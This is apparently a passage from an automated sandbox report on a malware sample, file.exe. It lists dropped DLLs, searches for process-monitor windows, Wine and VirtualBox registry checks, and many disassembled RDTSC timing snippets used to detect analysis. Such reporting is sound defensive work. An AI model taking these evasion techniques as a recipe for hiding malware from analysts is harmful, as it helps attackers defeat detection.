Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_008A9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58166

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF191F second address: AF1935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF1935 second address: AF1951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE76FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jng 00007F2EE8DE76FEh 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C65743 second address: C65747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C65CCA second address: C65CDE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2EE8DE76FAh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69668 second address: C6966C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69959 second address: C6995E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6995E second address: C6996B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6996B second address: C699D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE7709h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2EE8DE7706h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F2EE8DE76FDh 0x00000018 mov eax, dword ptr [eax] 0x0000001a jnp 00007F2EE8DE76FAh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F2EE8DE7702h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C699D7 second address: C699DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C699DC second address: C69A2D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 or dword ptr [ebp+122D3031h], edx 0x0000000f push 00000003h 0x00000011 jmp 00007F2EE8DE7709h 0x00000016 push 00000000h 0x00000018 jno 00007F2EE8DE76FCh 0x0000001e push 00000003h 0x00000020 movsx edx, bx 0x00000023 mov ecx, dword ptr [ebp+122D1AF7h] 0x00000029 push E90B76EBh 0x0000002e jp 00007F2EE8DE7708h 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69A2D second address: C69A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BCAh 0x00000009 popad 0x0000000a xor dword ptr [esp], 290B76EBh 0x00000011 lea ebx, dword ptr [ebp+1244B533h] 0x00000017 and cx, 202Ch 0x0000001c push eax 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7B263 second address: C7B267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8971E second address: C8972F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F2EE8E96BCAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C874CB second address: C874E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F2EE8DE76FEh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jl 00007F2EE8DE76F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C874E1 second address: C874FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2EE8E96BD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C87945 second address: C87975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2EE8DE7705h 0x0000000b push ebx 0x0000000c jbe 00007F2EE8DE76F6h 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F2EE8DE76F6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C87975 second address: C87979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C87979 second address: C8798D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE7700h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8798D second address: C87997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C87997 second address: C8799B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8799B second address: C879A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C87F95 second address: C87FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F2EE8DE76F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C920 second address: C7C93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2EE8E96BD8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8886E second address: C88874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C89019 second address: C89032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BD3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8919E second address: C891AA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2EE8DE76FEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C895BE second address: C895C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C895C2 second address: C895EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2EE8DE7704h 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F2EE8DE76F6h 0x00000015 jg 00007F2EE8DE76F6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8C592 second address: C8C596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8F796 second address: C8F7BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2EE8DE76FEh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F2EE8DE76FBh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8F7BC second address: C8F7FD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2EE8E96BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007F2EE8E96BD9h 0x00000015 jmp 00007F2EE8E96BD3h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jg 00007F2EE8E96BCEh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8F7FD second address: C8F801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E7B7 second address: C8E7C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C520B2 second address: C520C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE7700h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C520C6 second address: C520D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jo 00007F2EE8E96BC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C520D7 second address: C52105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F2EE8DE76FBh 0x0000000c popad 0x0000000d push edx 0x0000000e jne 00007F2EE8DE7702h 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F2EE8DE76F6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C968B2 second address: C968CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2EE8E96BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C968CD second address: C968D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96CB6 second address: C96CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96FD4 second address: C96FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96FD8 second address: C97000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BD8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F2EE8E96BEAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97000 second address: C97014 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2EE8DE76F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F2EE8DE76F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97014 second address: C97018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C520F3 second address: C52105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2EE8DE76F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F2EE8DE76F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97D6F second address: C97D75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97F8B second address: C97F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97F8F second address: C97FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2EE8E96BCDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9807F second address: C98085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98085 second address: C98095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jnp 00007F2EE8E96BC6h 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C985AC second address: C985D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F2EE8DE76F6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2EE8DE7705h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C986CE second address: C986DC instructions: 0x00000000 rdtsc 0x00000002 js 00007F2EE8E96BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98981 second address: C9898B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2EE8DE76F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98C6A second address: C98C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98C6E second address: C98C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C991BC second address: C991C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99BE1 second address: C99BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99A0A second address: C99A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99BE5 second address: C99BEF instructions: 0x00000000 rdtsc 0x00000002 js 00007F2EE8DE76F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99A0E second address: C99A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007F2EE8E96BCEh 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99BEF second address: C99BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE8DE76FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99BFF second address: C99C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F2EE8E96BC8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D25E5h], esi 0x0000002e mov edi, esi 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D315Eh], edx 0x00000038 push 00000000h 0x0000003a mov edi, dword ptr [ebp+122D22DBh] 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99C56 second address: C99C60 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2EE8DE76F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C4C1 second address: C9C4EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c sbb di, 4691h 0x00000011 mov si, bx 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D225Dh], ecx 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C4EC second address: C9C4FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F2EE8DE76F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9F4CE second address: C9F4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9F4D2 second address: C9F4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2EE8DE76FCh 0x0000000c jne 00007F2EE8DE76F6h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2A2D second address: CA2A33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2A33 second address: CA2AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F2EE8DE76F8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jmp 00007F2EE8DE7709h 0x0000002a push 00000000h 0x0000002c jmp 00007F2EE8DE7701h 0x00000031 push 00000000h 0x00000033 je 00007F2EE8DE76FBh 0x00000039 pushad 0x0000003a cmc 0x0000003b mov dl, ch 0x0000003d popad 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F2EE8DE7703h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2AAE second address: CA2AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2AB4 second address: CA2AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA032F second address: CA033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2EE8E96BC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4B00 second address: CA4B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE7703h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F2EE8DE7700h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 mov ebx, dword ptr [ebp+122D2A19h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F2EE8DE76F8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 jno 00007F2EE8DE770Fh 0x0000003b xchg eax, esi 0x0000003c push esi 0x0000003d jp 00007F2EE8DE7707h 0x00000043 pop esi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5B8F second address: CA5C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F2EE8E96BD6h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F2EE8E96BC8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F2EE8E96BC8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov dword ptr [ebp+12448C00h], eax 0x00000049 push 00000000h 0x0000004b mov edi, 3EBB2C20h 0x00000050 xchg eax, esi 0x00000051 jno 00007F2EE8E96BD4h 0x00000057 push eax 0x00000058 jo 00007F2EE8E96BD4h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5C21 second address: CA5C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6BA7 second address: CA6C34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2EE8E96BC8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2685h], edi 0x0000002c mov edi, edx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F2EE8E96BC8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov di, 0AEDh 0x0000004e push 00000000h 0x00000050 cld 0x00000051 cmc 0x00000052 push eax 0x00000053 pushad 0x00000054 jno 00007F2EE8E96BC8h 0x0000005a push eax 0x0000005b push edx 0x0000005c jp 00007F2EE8E96BC6h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2B96 second address: CA2B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
